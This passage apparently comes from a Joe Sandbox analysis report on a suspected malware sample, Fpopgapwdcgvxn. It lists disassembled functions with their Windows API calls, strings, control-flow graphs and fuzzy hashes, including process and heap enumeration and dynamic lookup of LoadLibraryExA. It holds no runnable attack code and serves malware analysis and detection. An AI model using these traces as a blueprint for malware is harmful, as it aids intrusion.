                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3557136124-0
                                                                                                    • Opcode ID: 4b7fc90706455d7068b1c0e6625215bcfa16aba2119fb19dd7b04e6d8f3375ef
                                                                                                    • Instruction ID: c4e9b6cace5cb4bd57a84bb39edca96b3a9f2ccc3b6c55b61617913ef5638bd4
                                                                                                    • Opcode Fuzzy Hash: 4b7fc90706455d7068b1c0e6625215bcfa16aba2119fb19dd7b04e6d8f3375ef
                                                                                                    • Instruction Fuzzy Hash: C1F04F7C2743448FD315FB29FC9691973A8E78AB147A5C175E9048B21CCAF4A851CFA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03308AB4 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 03308838: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03308ABF,?,?,03308B51,00000000,03308C2D), ref: 0330884C
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03308864
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03308876
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03308888
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0330889A
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 033088AC
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 033088BE
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32First), ref: 033088D0
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 033088E2
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 033088F4
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03308906
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03308918
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0330892A
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0330893C
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0330894E
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03308960
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03308972
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03308AC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 2242398760-0
                                                                                                    • Opcode ID: 4dd9df16f988af7f6bcd4fb96c6d6fc6a23b461963676af3cd96d0c69f8afb82
                                                                                                    • Instruction ID: b6bbc4c41950e7114d596107f01b378d7a4145cbff133b0c7c12682676f21b29
                                                                                                    • Opcode Fuzzy Hash: 4dd9df16f988af7f6bcd4fb96c6d6fc6a23b461963676af3cd96d0c69f8afb82
                                                                                                    • Instruction Fuzzy Hash: 70C08CA2602620278A10F6F82DD88D3878CCE491F370804B2B509EB141D3368C10D2A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032F7438 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103registrylibraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,032F75B0), ref: 032F7459
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 032F748C
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 032F74A7
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 032F74DD
                                                                                                    • RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,032F75B0), ref: 032F74F3
                                                                                                      • Part of subcall function 032C7B44: InitializeCriticalSection.KERNEL32(List,?,?,032F7509,00000000,00000000,?,?,00000000,032F75B0), ref: 032C7B63
                                                                                                      • Part of subcall function 032F7040: SetErrorMode.KERNEL32(00008000), ref: 032F7059
                                                                                                      • Part of subcall function 032F7040: GetModuleHandleA.KERNEL32(USER32,00000000,032F71A6,?,00008000), ref: 032F707D
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 032F708A
                                                                                                      • Part of subcall function 032F7040: LoadLibraryA.KERNEL32(imm32.dll,00000000,032F71A6,?,00008000), ref: 032F70A6
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 032F70C8
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 032F70DD
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 032F70F2
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 032F7107
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 032F711C
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 032F7131
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 032F7146
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 032F715B
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 032F7170
                                                                                                      • Part of subcall function 032F7040: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 032F7185
                                                                                                      • Part of subcall function 032F7040: SetErrorMode.KERNEL32(?,032F71AD,00008000), ref: 032F71A0
                                                                                                      • Part of subcall function 03301550: GetKeyboardLayout.USER32(00000000), ref: 03301595
                                                                                                      • Part of subcall function 03301550: GetDC.USER32(00000000), ref: 033015EA
                                                                                                      • Part of subcall function 03301550: GetDeviceCaps.GDI32(00000000,0000005A), ref: 033015F4
                                                                                                      • Part of subcall function 03301550: ReleaseDC.USER32(00000000,00000000), ref: 033015FF
                                                                                                      • Part of subcall function 03302758: LoadIconA.USER32(00000000,MAINICON), ref: 0330284F
                                                                                                      • Part of subcall function 03302758: GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 03302881
                                                                                                      • Part of subcall function 03302758: OemToCharA.USER32(?,?), ref: 03302894
                                                                                                      • Part of subcall function 03302758: CharNextA.USER32(?,00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 033028D3
                                                                                                      • Part of subcall function 03302758: CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 033028D9
                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,032F75B0), ref: 032F7577
                                                                                                    • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 032F7588
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
                                                                                                    • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                                    • API String ID: 1515865724-1126952177
                                                                                                    • Opcode ID: 513b89420fc4ca83eb8cc00186448868bb139419cba49364ef61cb37102fb27a
                                                                                                    • Instruction ID: 00dba80b43e5c4304282899ec620e10ed870b7fb15663973b0b06b14b096108e
                                                                                                    • Opcode Fuzzy Hash: 513b89420fc4ca83eb8cc00186448868bb139419cba49364ef61cb37102fb27a
                                                                                                    • Instruction Fuzzy Hash: CD415DB8A203059FCB04FFB9E8C099EB7F8EB58340F418065E505EF355DBB1A9808B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03308CFC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5069 3308cfc-3308d08 5070 3308de4-3308dee IsBadReadPtr 5069->5070 5071 3308e00-3308e06 5070->5071 5072 3308df0-3308df4 5070->5072 5072->5071 5073 3308df6-3308dfa 5072->5073 5073->5071 5074 3308d0d-3308d23 IsBadReadPtr 5073->5074 5075 3308de1 5074->5075 5076 3308d29-3308d60 GetModuleHandleW GetProcAddress 5074->5076 5075->5070 5078 3308d62-3308d67 5076->5078 5079 3308dc4-3308dce IsBadReadPtr 5076->5079 5078->5079 5079->5075 5080 3308dd0-3308dda IsBadReadPtr 5079->5080 5080->5075 5081 3308ddc-3308ddf 5080->5081 5081->5075 5082 3308d69-3308d7b call 32cfc1c 5081->5082 5085 3308d7d-3308d81 5082->5085 5086 3308dbe-3308dc1 5082->5086 5087 3308d83-3308d96 GetProcAddress 5085->5087 5088 3308d98-3308daa GetProcAddress 5085->5088 5086->5079 5089 3308dac-3308db9 call 32cfc1c 5087->5089 5088->5089 5089->5086
                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 03308D1C
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 03308D33
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 03308D39
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 03308DC7
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 03308DD3
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 03308DE7
                                                                                                    Strings
                                                                                                    • LoadLibraryExA, xrefs: 03308D29
                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 03308D2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$AddressHandleModuleProc
                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                    • API String ID: 1061262613-1650066521
                                                                                                    • Opcode ID: 7a9fe326c97c7c23a357c69b477b2fe67e0df107110a3b0f5da3d0443a2cc1db
                                                                                                    • Instruction ID: 5bdf1d916a32a088b11aa3d0d2ac85f17681305738d4329e83bd9b5af1fbe956
                                                                                                    • Opcode Fuzzy Hash: 7a9fe326c97c7c23a357c69b477b2fe67e0df107110a3b0f5da3d0443a2cc1db
                                                                                                    • Instruction Fuzzy Hash: 8B313A76600305BBDF60EB68CCD1F9AB7BCAF14364F044250EA24AF2C1D770A990CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03302758 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5107 3302758-3302765 5108 3302767-330276a call 32b3bdc 5107->5108 5109 330276f-3302787 call 32cd8bc 5107->5109 5108->5109 5113 3302797-33027a1 5109->5113 5114 3302789-3302791 5109->5114 5115 33027b1-33028a8 call 32b38a0 * 3 call 32d7168 LoadIconA call 32d753c GetModuleFileNameA OemToCharA call 32bce38 5113->5115 5116 33027a3-33027ab 5113->5116 5114->5113 5129 33028b8-33028c7 call 32bce6c 5115->5129 5130 33028aa-33028b3 call 32b9024 5115->5130 5116->5115 5134 33028c9 5129->5134 5135 33028cc-3302901 CharNextA CharLowerA call 32b49f8 call 32cea38 5129->5135 5130->5129 5134->5135 5139 3302906-3302914 5135->5139 5140 3302916-3302918 call 3302aac 5139->5140 5141 330291d-330294c call 3304b2c call 330568c 5139->5141 5140->5141 5147 330295d-3302964 5141->5147 5148 330294e-330295a call 32b3c34 5141->5148 5148->5147
                                                                                                    APIs
                                                                                                    • LoadIconA.USER32(00000000,MAINICON), ref: 0330284F
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 03302881
                                                                                                    • OemToCharA.USER32(?,?), ref: 03302894
                                                                                                    • CharNextA.USER32(?,00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 033028D3
                                                                                                    • CharLowerA.USER32(00000000,?,00000000,?,00000100,?,?,?,032F7548,00000000,00000000,?,?,00000000,032F75B0), ref: 033028D9
                                                                                                      • Part of subcall function 03302AAC: GetClassInfoA.USER32(032B0000,03302748,?), ref: 03302B0B
                                                                                                      • Part of subcall function 03302AAC: RegisterClassA.USER32(0331B650), ref: 03302B23
                                                                                                      • Part of subcall function 03302AAC: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 03302BBF
                                                                                                      • Part of subcall function 03302AAC: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 03302BE1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                                                    • String ID: MAINICON
                                                                                                    • API String ID: 2763768735-2283262055
                                                                                                    • Opcode ID: 6d7db63829809a045b8bb3113478d9baf62b4031d0db6ab87d74dcbcd91aa6d1
                                                                                                    • Instruction ID: 6d8f8312850415ed3a2e10825376aa8caf514b5e2f2e37e3a5cb153ed44c5ff9
                                                                                                    • Opcode Fuzzy Hash: 6d7db63829809a045b8bb3113478d9baf62b4031d0db6ab87d74dcbcd91aa6d1
                                                                                                    • Instruction Fuzzy Hash: EC514C74A143449FDB50EF28D8C4BCA7BF8AB15304F0845B9D848CF386D7B5D9888B61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B17C0 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5151 32b17c0-32b17d2 5152 32b17d8-32b17e8 5151->5152 5153 32b1a04-32b1a09 5151->5153 5154 32b17ea-32b17f7 5152->5154 5155 32b1840-32b1849 5152->5155 5156 32b1a0f-32b1a20 5153->5156 5157 32b1b1c-32b1b1f 5153->5157 5158 32b17f9-32b1806 5154->5158 5159 32b1810-32b181c 5154->5159 5155->5154 5162 32b184b-32b1857 5155->5162 5160 32b1a22-32b1a3e 5156->5160 5161 32b19d4-32b19e1 5156->5161 5163 32b1720-32b1749 VirtualAlloc 5157->5163 5164 32b1b25-32b1b27 5157->5164 5165 32b1808-32b180c 5158->5165 5166 32b1830-32b183d 5158->5166 5168 32b181e-32b182c 5159->5168 5169 32b188c-32b1895 5159->5169 5170 32b1a4c-32b1a5b 5160->5170 5171 32b1a40-32b1a48 5160->5171 5161->5160 5167 32b19e3-32b19f7 Sleep 5161->5167 5162->5154 5172 32b1859-32b1865 5162->5172 5173 32b177b-32b1781 5163->5173 5174 32b174b-32b1778 call 32b16e0 5163->5174 5167->5160 5175 32b19f9-32b1a00 Sleep 5167->5175 5181 32b18c8-32b18d2 5169->5181 5182 32b1897-32b18a4 5169->5182 5177 32b1a5d-32b1a71 5170->5177 5178 32b1a74-32b1a7c 5170->5178 5176 32b1aa8-32b1abe 5171->5176 5172->5154 5179 32b1867-32b187a Sleep 5172->5179 5174->5173 5175->5161 5183 32b1ac0-32b1ace 5176->5183 5184 32b1ad7-32b1ae3 5176->5184 5177->5176 5189 32b1a98-32b1a9a call 32b1668 5178->5189 5190 32b1a7e-32b1a96 5178->5190 5179->5154 5187 32b1880-32b1887 Sleep 5179->5187 5185 32b1944-32b1950 5181->5185 5186 32b18d4-32b18ff 5181->5186 5182->5181 5191 32b18a6-32b18ba Sleep 5182->5191 5183->5184 5192 32b1ad0 5183->5192 5195 32b1ae5-32b1af8 5184->5195 5196 32b1b04 5184->5196 5197 32b1978-32b1987 call 32b1668 5185->5197 5198 32b1952-32b1964 5185->5198 5193 32b1918-32b1926 5186->5193 5194 32b1901-32b190f 5186->5194 5187->5155 5199 32b1a9f-32b1aa7 5189->5199 5190->5199 5191->5181 5201 32b18bc-32b18c3 Sleep 5191->5201 5192->5184 5203 32b1928-32b1942 call 32b159c 5193->5203 5204 32b1994 5193->5204 5194->5193 5202 32b1911 5194->5202 5205 32b1afa-32b1aff call 32b159c 5195->5205 5206 32b1b09-32b1b1b 5195->5206 5196->5206 5210 32b1999-32b19d2 5197->5210 5216 32b1989-32b1993 5197->5216 5207 32b1968-32b1976 5198->5207 5208 32b1966 5198->5208 5201->5182 5202->5193 5203->5210 5204->5210 5205->5206 5207->5210 5208->5207
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?,032B205D), ref: 032B186C
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,032B205D), ref: 032B1882
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 0a77473c031e2c4c3fbb08081e63adde6931e29b151f0e78f5e1d5716f7c0f2d
                                                                                                    • Instruction ID: dccc47fc3d6a54a4ee12ea9bb0d8937e4a72b3b8f254d87b4e8ab9ecfb43e5b1
                                                                                                    • Opcode Fuzzy Hash: 0a77473c031e2c4c3fbb08081e63adde6931e29b151f0e78f5e1d5716f7c0f2d
                                                                                                    • Instruction Fuzzy Hash: 8FB10272620B518BC725DF2CE4E43A5BBF4FB95390F1882AEE4558B388D774B4A1C790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B1B28 Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5220 32b1b28-32b1b37 5221 32b1c08-32b1c0b 5220->5221 5222 32b1b3d-32b1b41 5220->5222 5223 32b1cf8-32b1cfc 5221->5223 5224 32b1c11-32b1c1b 5221->5224 5225 32b1b43-32b1b4a 5222->5225 5226 32b1ba4-32b1bad 5222->5226 5231 32b1d02-32b1d07 5223->5231 5232 32b1784-32b17a7 call 32b16e0 VirtualFree 5223->5232 5227 32b1bd8-32b1be5 5224->5227 5228 32b1c1d-32b1c29 5224->5228 5229 32b1b78-32b1b7a 5225->5229 5230 32b1b4c-32b1b57 5225->5230 5226->5225 5233 32b1baf-32b1bc3 Sleep 5226->5233 5227->5228 5234 32b1be7-32b1bfb Sleep 5227->5234 5235 32b1c2b-32b1c2e 5228->5235 5236 32b1c60-32b1c6e 5228->5236 5239 32b1b8f 5229->5239 5240 32b1b7c-32b1b8d 5229->5240 5237 32b1b59-32b1b5e 5230->5237 5238 32b1b60-32b1b75 5230->5238 5248 32b17a9-32b17b0 5232->5248 5249 32b17b2 5232->5249 5233->5225 5242 32b1bc9-32b1bd4 Sleep 5233->5242 5234->5228 5243 32b1bfd-32b1c04 Sleep 5234->5243 5244 32b1c32-32b1c36 5235->5244 5236->5244 5246 32b1c70-32b1c75 call 32b155c 5236->5246 5245 32b1b92-32b1b9f 5239->5245 5240->5239 5240->5245 5242->5226 5243->5227 5250 32b1c78-32b1c85 5244->5250 5251 32b1c38-32b1c3e 5244->5251 5245->5224 5246->5244 5253 32b17b5-32b17bf 5248->5253 5249->5253 5250->5251 5254 32b1c87-32b1c8e call 32b155c 5250->5254 5255 32b1c90-32b1c9a 5251->5255 5256 32b1c40-32b1c5e call 32b159c 5251->5256 5254->5251 5259 32b1cc8-32b1cf5 call 32b15fc 5255->5259 5260 32b1c9c-32b1cc4 VirtualFree 5255->5260
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 032B1BB3
                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?), ref: 032B1BCD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3472027048-0
                                                                                                    • Opcode ID: 30e6be7bca18b11942095caca8450db97739f8f14743049e2b91e5cefbeeec19
                                                                                                    • Instruction ID: a297cc0219ba466bb58f90fee39f3352d4e625302029be89b477a30cd81f6d03
                                                                                                    • Opcode Fuzzy Hash: 30e6be7bca18b11942095caca8450db97739f8f14743049e2b91e5cefbeeec19
                                                                                                    • Instruction Fuzzy Hash: C951E1316203018FD725DF28D9E5796BBF8EF45390F2882AEE4448B286D7B4E4D4C7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D7674 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5330 32d7674-32d76ae MulDiv 5331 32d76c6-32d76ff call 32d021c call 32d02bc call 32d0320 5330->5331 5332 32d76b0-32d76b7 call 32d7630 5330->5332 5343 32d7719-32d772e call 32b38d0 5331->5343 5344 32d7701-32d770c call 32d0550 5331->5344 5332->5331 5338 32d76b9-32d76c1 call 32b4820 5332->5338 5338->5331 5347 32d7711-32d7714 call 32d028c 5344->5347 5347->5343
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 032D769A
                                                                                                      • Part of subcall function 032D7630: GetDC.USER32(00000000), ref: 032D7639
                                                                                                      • Part of subcall function 032D7630: SelectObject.GDI32(00000000,058A00B4), ref: 032D764B
                                                                                                      • Part of subcall function 032D7630: GetTextMetricsA.GDI32(00000000), ref: 032D7656
                                                                                                      • Part of subcall function 032D7630: ReleaseDC.USER32(00000000,00000000), ref: 032D7667
                                                                                                    Strings
                                                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 032D76F0
                                                                                                    • MS Shell Dlg 2, xrefs: 032D7704
                                                                                                    • Tahoma, xrefs: 032D76BC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                                    • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                                                    • API String ID: 2013942131-1011973972
                                                                                                    • Opcode ID: 0e1c638867564a2aaeefefa07f4948140eac6fe95844ed2563f18ea8f8bfe85a
                                                                                                    • Instruction ID: 2ae82f65014296b73a0c44a230e9072c63a0a7a442ead76d7481bd0fe39d96b5
                                                                                                    • Opcode Fuzzy Hash: 0e1c638867564a2aaeefefa07f4948140eac6fe95844ed2563f18ea8f8bfe85a
                                                                                                    • Instruction Fuzzy Hash: 1211A338620708AFDB10EFACD84095D7BB9EB09700F9188A5E8009BB64D7799D81CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CEA38 Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 5367 32cea38-32cea66 GetClassInfoA 5368 32cea68-32cea70 5367->5368 5369 32cea72-32cea74 5367->5369 5368->5369 5370 32cea91-32ceac6 call 32b738c 5368->5370 5371 32cea76-32cea82 UnregisterClassA 5369->5371 5372 32cea87-32cea8c RegisterClassA 5369->5372 5375 32ceadc-32ceae2 5370->5375 5376 32ceac8-32ceace call 32ce97c 5370->5376 5371->5372 5372->5370 5378 32cead3-32cead7 SetWindowLongA 5376->5378 5378->5375
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(032B0000,032CEA28,?), ref: 032CEA59
                                                                                                    • UnregisterClassA.USER32(032CEA28,032B0000), ref: 032CEA82
                                                                                                    • RegisterClassA.USER32(0331AAF8), ref: 032CEA8C
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 032CEAD7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
